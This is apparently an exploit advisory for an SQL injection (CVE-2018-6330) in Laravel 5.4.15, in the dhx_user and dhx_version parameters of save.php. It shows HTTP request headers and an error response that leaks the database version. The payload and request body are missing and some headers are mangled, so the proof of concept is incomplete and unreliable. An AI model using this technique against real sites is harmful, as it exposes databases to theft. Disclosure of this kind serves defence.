#Exploit Title: Laravel SQLinjection 5.4.15

#Date: 26.01.2018

#Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQLinjection because it is not sanitized inside the save.php. The affected Parameters are dhx_user and dhx_version.

  • Proof of Concept

Login as user, then use the following request:

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:58.0) Gecko/20100101 Firefox/58.0<
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: href=“https://xxxxxxx.net/agenda“>https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

In your Response you will see a:

You have an Error in your Mysql Syntax.

To get the Database Version displayed you can send the following Payload:


The Response will look like this:


<span class=“exception_message“>PDO – sql execution failed<br />

XPATH syntax error: ‚\qqvkq5.7.18-1qvxqq'</span>